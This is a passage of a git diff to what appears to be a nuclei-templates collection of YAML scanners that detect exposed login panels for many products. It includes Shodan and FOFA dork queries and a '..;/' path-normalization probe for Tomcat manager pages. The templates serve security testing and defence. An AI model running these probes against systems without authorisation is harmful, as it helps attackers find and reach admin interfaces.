matchers: - - type: word words: - "Login - Adminer" @@ -39,4 +43,6 @@ requests: part: body group: 1 regex: - - '([0-9.]+)' \ No newline at end of file + - '([0-9.]+)' + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/adminset-panel.yaml b/exposed-panels/adminset-panel.yaml new file mode 100644 index 0000000000..c539d29be5 --- /dev/null +++ b/exposed-panels/adminset-panel.yaml @@ -0,0 +1,34 @@ +id: adminset-panel + +info: + name: Adminset Login Panel + author: ffffffff0x + severity: info + description: An Adminset login panel was detected. + classification: + cwe-id: CWE-200 + metadata: + fofa-query: app="AdminSet" + reference: + - https://github.com/guhongze/adminset/ + tags: adminset,panel + +requests: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "AdminSet Login" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/adobe/adobe-component-login.yaml b/exposed-panels/adobe/adobe-component-login.yaml index 3200d81577..1d46e94118 100644 --- a/exposed-panels/adobe/adobe-component-login.yaml +++ b/exposed-panels/adobe/adobe-component-login.yaml @@ -1,11 +1,17 @@ -id: adobe-component-login +id: adobe-coldfusion-login info: - name: Adobe Component Browser Login + name: Adobe ColdFusion Component Browser Login Panel author: dhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/6846 - tags: panel + description: An Adobe ColdFusion Component Browser login panel was detected. + reference: + - https://www.exploit-db.com/ghdb/6846 + classification: + cwe-id: CWE-200 + metadata: + shodan-query: http.component:"Adobe ColdFusion" + tags: panel,adobe,coldfusion requests: - method: GET @@ -21,3 +27,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/adobe/adobe-connect-central-login.yaml b/exposed-panels/adobe/adobe-connect-central-login.yaml index 1218c9f8d7..9f025cb957 100644 --- a/exposed-panels/adobe/adobe-connect-central-login.yaml +++ b/exposed-panels/adobe/adobe-connect-central-login.yaml @@ -1,10 +1,15 @@ id: adobe-connect-central-login info: - name: Adobe Connect Central Login + name: Adobe Connect Central Login Panel author: dhiyaneshDk severity: info - tags: adobe,panel + description: An Adobe Connect Central login panel was detected. + reference: + - https://www.adobe.com/products/adobeconnect.html + classification: + cwe-id: CWE-200 + tags: adobe,panel,connect-central requests: - method: GET @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/adobe/adobe-experience-manager-login.yaml b/exposed-panels/adobe/adobe-experience-manager-login.yaml index 2c1f158cea..c1a0f41886 100644 --- a/exposed-panels/adobe/adobe-experience-manager-login.yaml +++ b/exposed-panels/adobe/adobe-experience-manager-login.yaml @@ -1,11 +1,16 @@ id: adobe-experience-manager-login info: - name: Adobe-Experience-Manager + name: Adobe Experience Manager Login Panel author: dhiyaneshDK severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 - tags: panel,aem + description: An Adobe Experience Manager login panel was detected. + reference: + - https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 + - https://business.adobe.com/products/experience-manager/adobe-experience-manager.html + classification: + cwe-id: CWE-200 + tags: panel,aem,adobe requests: - method: GET @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/adobe/adobe-media-server.yaml b/exposed-panels/adobe/adobe-media-server.yaml index deaf55913a..2ee6efc2c8 100644 --- a/exposed-panels/adobe/adobe-media-server.yaml +++ b/exposed-panels/adobe/adobe-media-server.yaml @@ -1,10 +1,15 @@ id: adobe-media-server info: - name: Adobe Media Server + name: Adobe Media Server Login Panel author: dhiyaneshDK severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22 + description: An Adobe Media Server login panel was detected. + reference: + - https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22 + - https://helpx.adobe.com/support/adobe-media-server.html + classification: + cwe-id: CWE-200 tags: panel,adobe requests: @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/advance-setup.yaml b/exposed-panels/advance-setup.yaml index 957677ccf9..bbee2bbcf7 100644 --- a/exposed-panels/advance-setup.yaml +++ b/exposed-panels/advance-setup.yaml @@ -1,11 +1,16 @@ -id: advance-setup-login +id: advanced-setup-login info: - name: Advance Setup Login + name: ActionTec Modem Advanced Setup Login Panel author: dhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/6819 - tags: panel + description: An ActionTec Modem Advanced Setup login panel was detected. + reference: + - https://www.exploit-db.com/ghdb/6819 + - https://www.actiontec.com/dsl/ + classification: + cwe-id: CWE-200 + tags: panel,setup requests: - method: GET @@ -20,3 +25,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/aerohive-netconfig-ui.yaml b/exposed-panels/aerohive-netconfig-ui.yaml new file mode 100644 index 0000000000..b80bf49e52 --- /dev/null +++ b/exposed-panels/aerohive-netconfig-ui.yaml @@ -0,0 +1,39 @@ +id: aerohive-netconfig-ui + +info: + name: Aerohive NetConfig UI + author: pussycat0x + severity: info + description: An Aerohive NetConfig user interface was detected. The NetConfig UI provides a fundamental set of configurations for configuring basic network and HiveManager connectivity settings, and uploading new IQ Engine images to Extreme Networks APs. + reference: + - https://docs.aerohive.com/330000/docs/help/english/ng/Content/reference/docs/online-help-systems.htm + classification: + cwe-id: CWE-200 + metadata: + shodan-dork: http.title:"Aerohive NetConfig UI" + tags: panel,tech,hiveos,aerohive + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php5" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Aerohive NetConfig UI' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'version" align="right" valign="bottom">([0-9.a-z]+)<\/td>' + +# Enhanced by mp on 2022/03/21 diff --git a/exposed-panels/aims-password-mgmt-client.yaml b/exposed-panels/aims-password-mgmt-client.yaml deleted file mode 100644 index 76998f88a1..0000000000 --- a/exposed-panels/aims-password-mgmt-client.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: aims-password-mgmt-client - -info: - name: Aims Password Management Client Detect - author: iamthefrogy - severity: info - tags: panel - -requests: - - method: GET - path: - - "{{BaseURL}}/aims/ps/" - - matchers: - - type: word - words: - - "Avatier Corporation" diff --git a/exposed-panels/aims-password-portal.yaml b/exposed-panels/aims-password-portal.yaml deleted file mode 100644 index eb21d8e0eb..0000000000 --- a/exposed-panels/aims-password-portal.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: aims-password-portal - -info: - name: AIMS Password Management Portal - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6576 - tags: panel - -requests: - - method: GET - path: - - '{{BaseURL}}/aims/ps/default.aspx' - - matchers-condition: and - matchers: - - type: word - words: - - 'Password Management Client' - - type: status - status: - - 200 diff --git a/exposed-panels/airflow-panel.yaml b/exposed-panels/airflow-panel.yaml index 47a13475f4..1df0b6c38b 100644 --- a/exposed-panels/airflow-panel.yaml +++ b/exposed-panels/airflow-panel.yaml @@ -1,12 +1,19 @@ -id: airflow-panel +id: airflow-admin-login-panel info: - name: Airflow Admin login + name: Apache Airflow Admin Login Panel author: pdteam severity: info - tags: panel,apache,airflow + description: An Apache Airflow admin login panel was discovered. + reference: + - https://airflow.apache.org/docs/apache-airflow/stable/security/webserver.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: shodan-query: title:"Sign In - Airflow" + tags: panel,apache,airflow,admin requests: - method: GET @@ -25,4 +32,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/21 diff --git a/exposed-panels/akamai-cloudtest.yaml b/exposed-panels/akamai-cloudtest.yaml index 190c8a3050..5464d9d5b2 100644 --- a/exposed-panels/akamai-cloudtest.yaml +++ b/exposed-panels/akamai-cloudtest.yaml @@ -4,6 +4,11 @@ info: name: Akamai CloudTest Panel author: emadshanab severity: info + description: An Akamai CloudTest panel was discovered. + reference: + - https://techdocs.akamai.com/cloudtest/docs + classification: + cwe-id: CWE-200 tags: panel,akamai requests: @@ -21,4 +26,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/exposed-panels/alfresco-detect.yaml b/exposed-panels/alfresco-detect.yaml new file mode 100644 index 0000000000..563dd840e7 --- /dev/null +++ b/exposed-panels/alfresco-detect.yaml @@ -0,0 +1,40 @@ +id: alfresco-detect + +info: + name: Alfresco CMS Detection + author: pathtaga + severity: info + description: Alfresco CMS was discovered. + reference: + - https://www.alfresco.com/ + classification: + cwe-id: CWE-200 + tags: alfresco,tech,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/alfresco/api/-default-/public/cmis/versions/1.1/atom" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'org\/alfresco\/api\/opencmis\/OpenCMIS.get' + + - type: word + part: header + words: + - "application/json" + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'Enterprise v.*([0-9]\.[0-9]+\.[0-9]+)' + - 'Community v.*([0-9]\.[0-9]+\.[0-9]+)' + - 'Community Early Access v.*([0-9]\.[0-9]+\.[0-9]+)' + +# Enhanced by mp on 2022/03/16 diff --git a/exposed-panels/alienvault-usm.yaml b/exposed-panels/alienvault-usm.yaml index 5934bf4ae0..0214e622c8 100644 --- a/exposed-panels/alienvault-usm.yaml +++ b/exposed-panels/alienvault-usm.yaml @@ -1,12 +1,15 @@ id: alienVault-usm info: - name: AlienVault USM + name: AlienVault USM Login Panel author: dhiyaneshDK severity: info - tags: panel + description: An AlienVault USM login panel was detected. + classification: + cwe-id: CWE-200 metadata: - shodan-query: 'http.title:"AlienVault USM"' + shodan-query: http.title:"AlienVault USM" + tags: panel,alienvault requests: - method: GET @@ -21,3 +24,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/exposed-panels/ambari-exposure.yaml b/exposed-panels/ambari-exposure.yaml index 6dbaa22d28..a420d84dba 100644 --- a/exposed-panels/ambari-exposure.yaml +++ b/exposed-panels/ambari-exposure.yaml @@ -1,10 +1,15 @@ id: ambari-exposure info: - name: Apache Ambari Exposure / Unauthenticated Access + name: Apache Ambari Exposure Admin Login Panel author: pdteam severity: medium - tags: panel + description: An Apache Ambari panel was discovered. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 + tags: panel,apache,ambari,exposure requests: - method: GET @@ -16,4 +21,6 @@ requests: words: - 'Ambari' - 'href="http://www.apache.org/licenses/LICENSE-2.0"' - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/03/16 diff --git a/exposed-panels/amcrest-login.yaml b/exposed-panels/amcrest-login.yaml index f5c1e9646e..1c2714211b 100644 --- a/exposed-panels/amcrest-login.yaml +++ b/exposed-panels/amcrest-login.yaml @@ -4,11 +4,15 @@ info: name: Amcrest Login author: DhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/7273 + description: An Amcrest LDAP user login was discovered. + reference: + - https://www.exploit-db.com/ghdb/7273 + classification: + cwe-id: CWE-200 metadata: shodan-query: html:"amcrest" google-dork: intext:"amcrest" "LDAP User" - tags: panel,camera + tags: panel,camera,amcrest requests: - method: GET @@ -26,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/exposed-panels/ametys-admin-login.yaml b/exposed-panels/ametys-admin-login.yaml new file mode 100644 index 0000000000..7f33273288 --- /dev/null +++ b/exposed-panels/ametys-admin-login.yaml @@ -0,0 +1,36 @@ +id: ametys-admin-login + +info: + name: Ametys Admin Login Panel + author: pathtaga + severity: info + description: An Ametys admin login panel was discovered. + classification: + cwe-id: CWE-200 + tags: panel,ametys,cms + +requests: + - method: GET + path: + - '{{BaseURL}}/_admin/index.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'Ametys - Log in' + - '' + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - ' ([0-9.]+)' + +# Enhanced by mp on 2022/03/16 diff --git a/exposed-panels/ampps-admin-panel.yaml b/exposed-panels/ampps-admin-panel.yaml index c297a5060f..1ced15ef7b 100644 --- a/exposed-panels/ampps-admin-panel.yaml +++ b/exposed-panels/ampps-admin-panel.yaml @@ -4,7 +4,10 @@ info: name: AMPPS Admin Login Panel author: deFr0ggy severity: info - tags: panel,ampps + description: An AMPPS Admin login panel was detected. + classification: + cwe-id: CWE-200 + tags: panel,ampps,login requests: - method: GET @@ -33,3 +36,5 @@ requests: group: 1 regex: - 'mpps\.com">Powered By FREE ([A-Z 0-9.]+)<\/a>' + +# Enhanced by mp on 2022/03/16 diff --git a/exposed-panels/ampps-panel.yaml b/exposed-panels/ampps-panel.yaml index 2b77a49db3..4a44ba9360 100644 --- a/exposed-panels/ampps-panel.yaml +++ b/exposed-panels/ampps-panel.yaml @@ -4,7 +4,10 @@ info: name: AMPPS Login Panel author: deFr0ggy severity: info - tags: panel,ampps + description: An AMPPS login panel was detected. + classification: + cwe-id: CWE-200 + tags: panel,ampps,login requests: - method: GET @@ -33,3 +36,5 @@ requests: group: 1 regex: - 'mpps\.com">Powered By FREE ([A-Z 0-9.]+)<\/a>' + +# Enhanced by mp on 2022/03/16 diff --git a/exposed-panels/ansible-semaphore-panel.yaml b/exposed-panels/ansible-semaphore-panel.yaml new file mode 100644 index 0000000000..9c7790ff1d --- /dev/null +++ b/exposed-panels/ansible-semaphore-panel.yaml @@ -0,0 +1,32 @@ +id: ansible-semaphore-panel + +info: + name: Ansible Semaphore Panel Detect + author: Yuzhe-zhang-0 + severity: info + description: An Ansible Semaphore login panel was detected. + reference: + - https://ansible-semaphore.com/ + - https://github.com/ansible-semaphore/semaphore + classification: + cwe-id: CWE-200 + metadata: + shodan-query: http.html:"Semaphore" + tags: panel,ansible,semaphore,cicd,oss + +requests: + - method: GET + path: + - '{{BaseURL}}/auth/login' + + matchers-condition: or + matchers: + - type: word + words: + - 'Ansible Semaphore' + + - type: regex + regex: + - 'Semaphore' + +# Enhanced by mp on 2022/03/23 diff --git a/exposed-panels/ansible-tower-exposure.yaml b/exposed-panels/ansible-tower-exposure.yaml index 72789c4755..66766fc246 100644 --- a/exposed-panels/ansible-tower-exposure.yaml +++ b/exposed-panels/ansible-tower-exposure.yaml @@ -2,9 +2,18 @@ id: ansible-tower-exposure info: name: Ansible Tower Exposure - author: pdteam + author: pdteam,idealphase severity: low - tags: panel + description: Ansible Tower was detected. Ansible Tower is a commercial offering that helps teams manage complex multi-tier deployments by adding control, knowledge, and delegation to Ansible-powered environments. + reference: + - https://docs.ansible.com/ansible-tower/3.8.4/html/administration/ + - https://docs.ansible.com/ansible-tower/latest/html/release-notes/index.html + classification: + cwe-id: CWE-200 + metadata: + google-query: intitle:"Ansible Tower" + shodan-query: title:"Ansible Tower" + tags: panel,ansible requests: - method: GET @@ -15,5 +24,14 @@ requests: - type: word words: - "Ansible Tower" - - "ansible-main-menu" - condition: and \ No newline at end of file + - "ansible-bootstrap" + condition: or + + extractors: + - type: regex + group: 1 + part: body + regex: + - 'href="\/static\/assets\/favicon\.ico\?v=(.+)" \/>' + +# Enhanced by mp on 2022/03/16 diff --git a/exposed-panels/apache/apache-apisix-panel.yaml b/exposed-panels/apache/apache-apisix-panel.yaml new file mode 100644 index 0000000000..2c6124e710 --- /dev/null +++ b/exposed-panels/apache/apache-apisix-panel.yaml @@ -0,0 +1,30 @@ +id: apache-apisix-panel + +info: + name: Apache APISIX Login Panel + author: pikpikcu + severity: info + description: An Apache APISIX login panel was detected. + classification: + cwe-id: CWE-200 + metadata: + fofa-query: title="Apache APISIX Dashboard" + tags: apache,apisix,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/user/login?redirect=%2F" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Apache APISIX Dashboard' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/exposed-panels/public-tomcat-manager.yaml b/exposed-panels/apache/public-tomcat-manager.yaml similarity index 61% rename from exposed-panels/public-tomcat-manager.yaml rename to exposed-panels/apache/public-tomcat-manager.yaml index 67f8d2ab1b..fea6aabea5 100644 --- a/exposed-panels/public-tomcat-manager.yaml +++ b/exposed-panels/apache/public-tomcat-manager.yaml @@ -1,10 +1,13 @@ id: public-tomcat-manager info: - name: tomcat manager disclosure + name: Apache Tomcat Manager Disclosure author: Ahmed Sherif,geeknik severity: info - tags: panel + description: An Apache Tomcat Manager panel was discovered. + classification: + cwe-id: CWE-200 + tags: panel,tomcat,apache requests: - method: GET @@ -16,9 +19,12 @@ requests: matchers: - type: word words: - - Apache Tomcat + - "Apache Tomcat" + - type: status status: - 401 - 200 condition: or + +# Enhanced by mp on 2022/03/16 diff --git a/exposed-panels/apache/tomcat-pathnormalization.yaml b/exposed-panels/apache/tomcat-pathnormalization.yaml new file mode 100644 index 0000000000..649547cfeb --- /dev/null +++ b/exposed-panels/apache/tomcat-pathnormalization.yaml @@ -0,0 +1,36 @@ +id: tomcat-manager-pathnormalization + +info: + name: Tomcat Manager Path Normalization + author: organiccrap + severity: info + description: A Tomcat Manager login panel was discovered via path normalization. Normalizing a path involves modifying the string that identifies a path or file so that it conforms to a valid path on the target + operating system. + reference: + - https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/mitigation-path-normalization + - https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf + classification: + cwe-id: CWE-200 + tags: panel,tomcat,apache + +requests: + - method: GET + path: + - '{{BaseURL}}/..;/manager/html' + - '{{BaseURL}}/..;/host-manager/html' + + matchers-condition: and + matchers: + - type: word + words: + - 'username="tomcat" password="s3cret"' + - 'manager-gui' + condition: and + + - type: status + negative: true + status: + - 403 + - 401 + +# Enhanced by mp on 2022/03/17 diff --git a/exposed-panels/apiman-panel.yaml b/exposed-panels/apiman-panel.yaml index eb3fa9f385..24bbf1f89b 100644 --- a/exposed-panels/apiman-panel.yaml +++ b/exposed-panels/apiman-panel.yaml @@ -1,10 +1,14 @@ id: apiman-panel info: - name: Apiman Instance Detection Template + name: Apiman Login Panel author: righettod severity: info - description: Try to detect the presence of a Apiman instance via the login redirection + description: An Apiman instance was detected via the login redirection. + reference: + - https://www.apiman.io/latest/ + classification: + cwe-id: CWE-200 tags: panel,apiman requests: @@ -21,4 +25,6 @@ requests: - type: status status: - - 302 \ No newline at end of file + - 302 + +# Enhanced by mp on 2022/03/18 diff --git a/exposed-panels/aptus-detect.yaml b/exposed-panels/aptus-detect.yaml new file mode 100644 index 0000000000..2b2f0ef0c3 --- /dev/null +++ b/exposed-panels/aptus-detect.yaml @@ -0,0 +1,25 @@ +id: aptus-detect + +info: + name: Aptus Login Panel + author: princechaddha + severity: info + metadata: + shodan-query: http.title:"Aptus Login" + tags: panel,aptus + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Aptus Login" + + - type: status + status: + - 200 diff --git a/exposed-panels/arcgis/arcgis-panel.yaml b/exposed-panels/arcgis/arcgis-panel.yaml new file mode 100644 index 0000000000..b6b6fb7696 --- /dev/null +++ b/exposed-panels/arcgis/arcgis-panel.yaml @@ -0,0 +1,44 @@ +id: arcgis-panel + +info: + name: ArcGIS Enterprise Panel + author: Podalirius + severity: info + description: An ArcGIS instance was discovered. + reference: + - https://enterprise.arcgis.com/en/ + classification: + cwe-id: CWE-200 + tags: docs,arcgis,cms,panel + +requests: + - method: GET + path: + - '{{BaseURL}}/portal/portalhelp/en/' + + matchers-condition: and + matchers: + - type: word + words: + - 'ArcGIS Enterprise' + - 'Installation and Deployment' + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - ' ([0-9.]+)' + + - type: regex + part: body + group: 2 + regex: + - '(Released Version:[\n\t ]+(([0-9]+(.[0-9]+)?(.[0-9]+)?)([\n\t ]+\([A-Za-z]+[\t ]+20[0-9][0-9]\))?))' + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/arcgis/arcgis-rest-api.yaml b/exposed-panels/arcgis/arcgis-rest-api.yaml new file mode 100644 index 0000000000..897c70d812 --- /dev/null +++ b/exposed-panels/arcgis/arcgis-rest-api.yaml @@ -0,0 +1,29 @@ +id: arcgis-rest-api + +info: + name: ArcGIS Exposed Docs + author: Podalirius + severity: info + description: ArcGIS documents were discovered. + reference: + - https://enterprise.arcgis.com/en/ + classification: + cwe-id: CWE-200 + tags: api,arcgis,cms + +requests: + - method: GET + path: + - '{{BaseURL}}/server/sdk/rest/index.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'ArcGIS REST API' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/argocd-login.yaml b/exposed-panels/argocd-login.yaml new file mode 100644 index 0000000000..546bbfd8cc --- /dev/null +++ b/exposed-panels/argocd-login.yaml @@ -0,0 +1,32 @@ +id: argocd-detect + +info: + name: Argo CD Login Panel + author: Adam Crosser,daffainfo + severity: info + description: An Argo CD login panel was discovered. + reference: + - https://argoproj.github.io/cd/ + classification: + cwe-id: CWE-200 + metadata: + shodan-query: http.title:"Argo CD" + tags: panel,argocd,login,kubernetes + +requests: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Argo CD' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/atlassian-crowd-panel.yaml b/exposed-panels/atlassian-crowd-panel.yaml index b0a82d7536..3532e9a84c 100644 --- a/exposed-panels/atlassian-crowd-panel.yaml +++ b/exposed-panels/atlassian-crowd-panel.yaml @@ -1,10 +1,15 @@ id: atlassian-crowd-panel info: - name: Atlassian Crowd panel detect + name: Atlassian Crowd Login Panel author: organiccrap severity: info - tags: panel + description: An Atlassian Crowd login panel was discovered. + reference: + - https://www.atlassian.com/ + classification: + cwe-id: CWE-200 + tags: panel,atlassian requests: - method: GET @@ -16,3 +21,5 @@ requests: words: - Atlassian Crowd - Login part: body + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/atvise-login.yaml b/exposed-panels/atvise-login.yaml new file mode 100644 index 0000000000..bc58bf1715 --- /dev/null +++ b/exposed-panels/atvise-login.yaml @@ -0,0 +1,33 @@ +id: atvise-login + +info: + name: Atvise Login Panel + author: idealphase + severity: info + description: An Atvise login panel was discovered. Atvise is a leading visualization and control center solutions based on pure web technology. + reference: + - https://www.exploit-db.com/ghdb/7837 + - https://www.atvise.com/en + classification: + cwe-id: CWE-200 + metadata: + google-dork: intitle:"atvise - next generation" + tags: panel,atvise + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'atvise - next generation' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/avantfax-panel.yaml b/exposed-panels/avantfax-panel.yaml new file mode 100644 index 0000000000..7694287813 --- /dev/null +++ b/exposed-panels/avantfax-panel.yaml @@ -0,0 +1,41 @@ +id: avantfax-panel + +info: + name: AvantFAX Login Panel + author: pikpikcu,daffainfo + severity: info + description: An AvantFAX login panel was discovered. + reference: + - http://www.avantfax.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 + metadata: + shodan-query: http.title:"AvantFAX - Login" + tags: panel,avantfax,login + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "- AvantFAX - Login" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '

([0-9.]+)<\/p>' + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/avatier-password-management.yaml b/exposed-panels/avatier-password-management.yaml new file mode 100644 index 0000000000..49cd4c37ae --- /dev/null +++ b/exposed-panels/avatier-password-management.yaml @@ -0,0 +1,37 @@ +id: avatier-password-management + +info: + name: Avatier Password Management Panel + author: praetorian-thendrickson,iamthefrogy,dhiyaneshDK + severity: info + description: An Avatier password management panel was detected. + reference: + - https://www.exploit-db.com/ghdb/6576 + - https://www.avatier.com/products/identity-management/password-management/ + classification: + cwe-id: CWE-200 + metadata: + shodan-query: http.favicon.hash:983734701 + tags: panel,avatier,aims + +requests: + - method: GET + path: + - '{{BaseURL}}/aims/ps/' + + redirects: true + max-redirects: 2 + matchers-condition: or + matchers: + - type: word + words: + - 'LabelWelcomeToPS' + - 'Avatier Corporation' + - 'Welcome to Password Management' + condition: or + + - type: word + words: + - 'Password Management Client' + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/avaya/avayaaura-cm-panel.yaml b/exposed-panels/avaya/avayaaura-cm-panel.yaml new file mode 100644 index 0000000000..17b93b7838 --- /dev/null +++ b/exposed-panels/avaya/avayaaura-cm-panel.yaml @@ -0,0 +1,25 @@ +id: avayaaura-cm-panel + +info: + name: Avaya Aura Communication Manager (CM) Panel + author: princechaddha + severity: info + tags: panel,avaya + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/common/login/webLogin" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Avaya Aura" + - "Communication Manager (CM)" + condition: and + + - type: status + status: + - 200 diff --git a/exposed-panels/avaya/avayaaura-system-manager-panel.yaml b/exposed-panels/avaya/avayaaura-system-manager-panel.yaml new file mode 100644 index 0000000000..928b51eb3b --- /dev/null +++ b/exposed-panels/avaya/avayaaura-system-manager-panel.yaml @@ -0,0 +1,32 @@ +id: avayaaura-system-manager-panel + +info: + name: Avaya Aura System Manager Panel + author: princechaddha + severity: info + tags: panel,avaya + +requests: + - method: GET + path: + - "{{BaseURL}}/network-login/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Avaya Aura" + - "System Manager" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - " System Manager ([a-z0-9.]+)" diff --git a/technologies/aviatrix-detect.yaml b/exposed-panels/aviatrix-panel.yaml similarity index 58% rename from technologies/aviatrix-detect.yaml rename to exposed-panels/aviatrix-panel.yaml index 64be83fd08..9107535ba9 100644 --- a/technologies/aviatrix-detect.yaml +++ b/exposed-panels/aviatrix-panel.yaml @@ -1,12 +1,17 @@ -id: aviatrix-detect +id: aviatrix-panel info: - name: Aviatrix Detect - author: pikpikcu,philippedelteil + name: Aviatrix Cloud Controller Panel Login + author: pikpikcu,philippedelteil,daffainfo severity: info - tags: tech,aviatrix + description: An Aviatrix Cloud Controller login panel was detected. + reference: + - https://docs.aviatrix.com/HowTos/controller_config.html + classification: + cwe-id: CWE-200 metadata: - shodan-query: http.title:"AviatrixController", http.title:"Aviatrix Cloud Controller" + shodan-query: http.title:"Aviatrix Cloud Controller" + tags: panel,aviatrix requests: - method: GET @@ -29,3 +34,5 @@ requests: name: "favicon" dsl: - "status_code==200 && (\"7c1c26856345cd7edbf250ead0dc9332\" == md5(body))" + +# Enhanced by mp on 2022/03/23 diff --git a/exposed-panels/avtech-avn801-camera-panel.yaml b/exposed-panels/avtech-avn801-camera-panel.yaml new file mode 100644 index 0000000000..6c233d50a7 --- /dev/null +++ b/exposed-panels/avtech-avn801-camera-panel.yaml @@ -0,0 +1,30 @@ +id: avtech-avn801-camera-panel + +info: + name: Avtech AVN801 Network Camera Panel Detect + author: idealphase + severity: info + description: AVTECH offers a range of IP camera series with different shapes, resolutions and lens to fulfill different demands. Select the items needed to narrow down product search. + reference: + - http://www.avtech.com.tw + metadata: + shodan-query: title:"login" product:"Avtech AVN801 network camera" + tags: panel,avtech,iot,camera + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - "IP Surveillance for Your Life" + - "avtech" + - "/cgi-bin/guest/Login.cgi?rnd=" + condition: and + + - type: status + status: + - 200 diff --git a/exposed-panels/avtech-dvr-exposure.yaml b/exposed-panels/avtech-dvr-exposure.yaml index f3f362bcc8..5b27adcab8 100644 --- a/exposed-panels/avtech-dvr-exposure.yaml +++ b/exposed-panels/avtech-dvr-exposure.yaml @@ -2,10 +2,11 @@ id: avtech-dvr-exposure info: name: Avtech AVC798HA DVR Information Exposure - description: Under the /cgi-bin/nobody folder every CGI script can be accessed without authentication. - reference: http://www.avtech.com.tw/ author: geeknik severity: low + description: Under the /cgi-bin/nobody folder every CGI script can be accessed without authentication. + reference: + - http://www.avtech.com.tw/ tags: dvr,exposure,avtech requests: diff --git a/exposed-panels/aws-opensearch-login.yaml b/exposed-panels/aws-opensearch-login.yaml new file mode 100644 index 0000000000..14f111d73a --- /dev/null +++ b/exposed-panels/aws-opensearch-login.yaml @@ -0,0 +1,25 @@ +id: aws-opensearch-login + +info: + name: AWS OpenSearch Default Login + author: Higor Melgaço (eremit4) + severity: medium + description: Searches for the AWS OpenSearch login page + reference: + - https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ + tags: panel,opensearch,aws + +requests: + - method: GET + path: + - '{{BaseURL}}/_dashboards/app/login' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Please login to OpenSearch Dashboards" \ No newline at end of file diff --git a/exposed-panels/axigen-webadmin.yaml b/exposed-panels/axigen-webadmin.yaml index 5aa5cc7b3e..515f319cbe 100644 --- a/exposed-panels/axigen-webadmin.yaml +++ 